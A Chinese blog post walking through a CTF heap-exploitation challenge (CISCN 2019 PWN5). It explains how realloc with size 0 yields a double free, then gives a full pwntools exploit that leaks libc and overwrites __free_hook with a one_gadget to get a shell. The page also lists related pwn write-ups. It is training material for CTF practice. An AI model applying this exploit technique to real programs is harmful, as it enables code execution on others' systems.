pwn--realloc [CISCN 2019东南]PWN5

最新推荐文章于 2024-05-09 18:10:33 发布
最新推荐文章于 2024-05-09 18:10:33 发布
阅读量254 收藏 6
点赞数 5
文章标签: 算法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A13837377363/article/details/138183550
版权

首先学习一下realloc这个函数,以下是文心一言的解释:

realloc是C语言库函数之一,用于重新分配内存空间。它的主要功能是调整一块内存空间的大小。当需要增加内存空间时,realloc会分配一个新的更大的内存块,然后将原内存块的内容复制到新块中,并释放原内存块;当需要减少内存空间时,realloc会尝试将内存块的大小减少到新的大小,并返回调整后的内存块地址。

realloc函数的原型为:void* realloc(void* ptr, size_t size); 其中,ptr是指向之前分配的内存块的指针,size是要分配的新内存块的大小(以字节为单位)。如果ptr为NULL,则realloc函数的行为与malloc函数相同;如果size为0,则realloc函数会释放由ptr指向的内存块。realloc函数的返回值是指向新分配的内存块的指针。如果分配成功,则返回值不为NULL;如果分配失败,则返回NULL。

提取关键点:分配更大的内存时会先释放原chunk,当size为0时,会释放ptr。这是不借助free函数的释放,不会将指针清空,可以用来构造doublefree。

还有一个知识点:

在程序中,我们请求了一个大小为0的堆块。

但通过gdb调试发现,堆块大小为0x20,也就是说malloc(0),malloc(8)和malloc(0x10)效果其实是一样的,由于fd指针和bk指针,一个chunk的大小至少是0x20。

有了以上两个知识点,让我们进入下面这道题:

delete之后会把指针清空。没办法uaf。也不存在堆溢出。这该怎么办呢。

发现edit有realloc函数,恍然大悟!

这里补充一点,低版本,至少libc 2.27及以下当你从unsortedbin分配一个堆块时,不会把fd和bk指针清空,可以利用这个泄露Libc基址,至少libc 2.31及以上会把这两个区域清空。

以下是exp:

from pwn import *
context.arch='amd64'
elf=ELF('./pwn')
libc=ELF('./libc-2.27.so')
io=remote('node5.anna.nssctf.cn',24158)
#io=remote('pwn.challenge.ctf.show',28284)
#io=process('./pwn')

def add(size,content='a'):
    io.recvuntil(b"Your choice:")
    io.sendline(b'1')
    io.recvuntil(b"size?>")
    io.sendline(str(size).encode())
    io.recvuntil(b"content:")
    io.send(content)

def delete(idx) :
    io.recvuntil(b"Your choice:")
    io.sendline(b'4')
    io.recvuntil(b"Index:")
    io.sendline(str(idx).encode())

def show(idx):
    io.recvuntil(b"Your choice:")
    io.sendline(b'3')
    io.recvuntil(b"Index:")
    io.sendline(str(idx).encode())

def edit(idx,content) :
    io.recvuntil(b"Your choice:")
    io.sendline(b'2')
    io.recvuntil(b"Index:")
    io.sendline(str(idx).encode())
    io.recvuntil(b"New content:")
    io.send(content)

add(0x410)#0
add(0x10)#1
delete(0)
add(0x410,b'a'*5+b'b'*3)#0
show(0)
io.recvuntil(b'bbb')
usbin=u64(io.recv(6).ljust(0x8,b'\x00'))
print('usbin:',hex(usbin))
#gdb.attach(io)
#pause()
malloc_hook=usbin-0x70
libc_base=malloc_hook-libc.sym['__malloc_hook']
free_hook=libc_base+libc.sym['__free_hook']
system=libc_base+libc.sym['system']
print('free_hook:',hex(free_hook))
print('system:',hex(system))
add(0)#2
delete(1)
io.recvuntil(b"Your choice:")
io.sendline(b'2')
io.recvuntil(b"Index:")
io.sendline(b'2')
delete(2)
one_gadget=libc_base+0x4f302
add(0x10,p64(free_hook))#1
#gdb.attach(io)
#pause()
add(0x10,p64(one_gadget))#2
add(0x20,b'/bin/sh\x00')#3
delete(3)
io.interactive()

奇怪的轩轩
关注
  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
[BUUCTF-pwn] ciscn_2019_ne_4
weixin_52640415的博客
12-20 171
漏洞点: 在edit里,长度检查里如果长度比原长度大10则返回原长度+1 off_by_one __int64 __fastcall sub_E3C(int a1, unsigned int a2) { __int64 result; // rax if ( a1 > (int)a2 ) return a2; if ( a2 - a1 == 10 ) LODWORD(result) = a1 + 1; else LODWORD(result) = a1;
[BUUCTF-pwn] ciscn_2019_nw_2
weixin_52640415的博客
10-28 242
[BUUCTF-pwn]— ciscn_2019_nw_2 题目地址: https://buuoj.cn/challenges#ciscn_2019_nw_2 checksec看保护-全开(堆题都一样可以不看) 菜单:只有add和free 且free未删指针有明显的UAF,而且是ubuntu18对应的libc-2.27版本可以直接free*2 free限制了次数3 add分两部分一个8字节一个68,这样可以独立修改fp的一部分 网上没搜到exp #先获取libc 只能free 3次,且块大小固定为0x7
星盟-pwn-babyheap
qq_65147345的博客
08-01 186
1. 堆重叠获取libc_base地址 2. 使用unsorted attack更改global_max_fast,使chunk进入fastbin 3. 使用fastbin attack更改malloc_hook为one_gadget
2021 祥云杯 pwn-note
z1r0的博客
10-14 338
在第一个图那里下个断点,查看stack时发现%11$p这里有一个stdout,这个给了我们泄露libc的机会,我们可以打stdout的flag和write_ptr,具体的可以看别的师傅对stdout泄露libc分析的文章。偏移为7, 这里笔者用的ubuntu20.04的2.31libc做的,不需要利用realloc来调整可以直接利用,题目给的libc需要利用realloc来调整一下即可。拿到libc之后,算出ogg,ogg出来了,可以再利用scanf任意地址写打malloc为ogg。
2021 ciscn-pwn 初赛
csdn546229768的博客
06-05 489
2021全国大学生信息安全竞赛-pwny_init 分析 mainreadwrite这个程序其实就是两个核心函数,和名字一样,因为操作的fd指针是个随机参数文件,我们通过修改fd指针为0,也就是控制台就可以实现任意读写了,那么程序就简单了很简单我们看这个这里组的偏移是由我们决定的且没有大小限制(是int64类型的变量)。ok看看bss段qword_202060和随机函数的fd指针只相差0x100偏移,那么就可以间接的控制fd为0了,具体利用如下: 这里就可以将fd置为0,我也是gdb调试调试着就发现的,仔细
攻防世界-PWN-Challenge-Wirteup
07-29 778
目录 dice_game 反应釜开关控制 dice_game 这个提跟新手区一个题很像,都是利用溢出覆盖随机数的种子,使得随机数产生的序列固定,在本地产生序列后脚本提交就可以了 ida查看程序 栈信息: 将seed覆盖为全0,使用c在kali中跑一下: #include <stdlib.h> #include <stdio.h> int main() { srand(0); for(int i = 0; i < 50; i++) { i.
[BUUCTF-pwn] [BSidesCF 2019]StrawClutcher
weixin_52640415的博客
02-10 281
looooooooooooooooooooooooooong代码 题目说是ftp服务器,其实就是在堆里建链每个文件带固定长度数据。代码长得不可相像,比如put就得用7个分支判断(3个字母大小写和1个空格)然后再判断参数。 数据结构: 管理块:0x50 文件名:0x28, 大小:8, 数据块指针:8,8字节,下一块指针:8 数据块:长度在puts时输入 命令格式: put filename filesize 随后发送数据(长度由filesize确定) rename filena...
[BUUCTF-pwn] [HarekazeCTF2019]Ramen
weixin_52640415的博客
01-12 1014
看exp再慢慢消化。逻辑错造成的指针溢出。 这个题虽然有UAF但是利用起来很困难,本来不想看那么长的程序,没办法看程序再看了exp后才明白。 程序分主程序和order,serv,change 三个函数,主程序没啥内容,但是循环队列的指针v4放在这了。v4依次表示队列块指针,头id,尾id和总长度。 void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) { int v3; // eax char v4[24]; //
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 1889
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
[Easy] leetcode-35 搜索插入位置
最新发布
Sofine
05-09 118
给定一个排序数组和一个目标值,在数组中找到目标值,并返回其索引。如果目标值不存在于数组中,返回它将会被按顺序插入的位置。利用二分查找可以更快的找到,只需要修改返回值即可,注意获取mid的计算方法考虑了溢出。注意到是按顺序排列的数组,那么按顺序遍历,如果找到,则跳出循环返回索引即可。如果找到最后还没找到,则返回数组长度索引值即为插入位置。
实习面试之算法准备:数学题
lihao1875699404的博客
05-02 1035
这不难得出,第 1 轮会被按,第 2 轮,第 3 轮,第 6 轮都会被按。dp[i][j] 表示当剩下的石子堆为下标 i到下标 j时,即在下标范围 [i,j] 中,在双方都做最好选择的情况下,先手与后手的最大得分差值为多少。这样一直循环下去,我们发现只要踩到 4 的倍数,就落入了圈套,永远逃不出 4 的倍数,而且一定会输。盏灯的开关,有的被关闭,比如 3,有的被打开,比如 6)…显然,如果对手拿的时候只剩 4 颗石子,那么无论他怎么拿,总会剩下 1~3 颗石子,我就能赢。第一轮,你将会打开所有灯泡。
C语言 | Leetcode C语言题解之第73题矩阵置零
m0_59237910的博客
05-07 281
C语言 | Leetcode C语言题解之第73题矩阵置零
LeetCode 35.搜索插入位置
tus00000的博客
05-08 193
给定一个排序数组和一个目标值,在数组中找到目标值,并返回其索引。如果目标值不存在于数组中,返回它将会被按顺序插入的位置。输入: nums = [1,3,5,6], target = 5。输入: nums = [1,3,5,6], target = 2。输入: nums = [1,3,5,6], target = 7。此算法时间复杂度为O(logn),空间复杂度为O(1)。请必须使用时间复杂度为 O(log n) 的算法。nums 为 无重复元素 的 升序 排列数组。
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值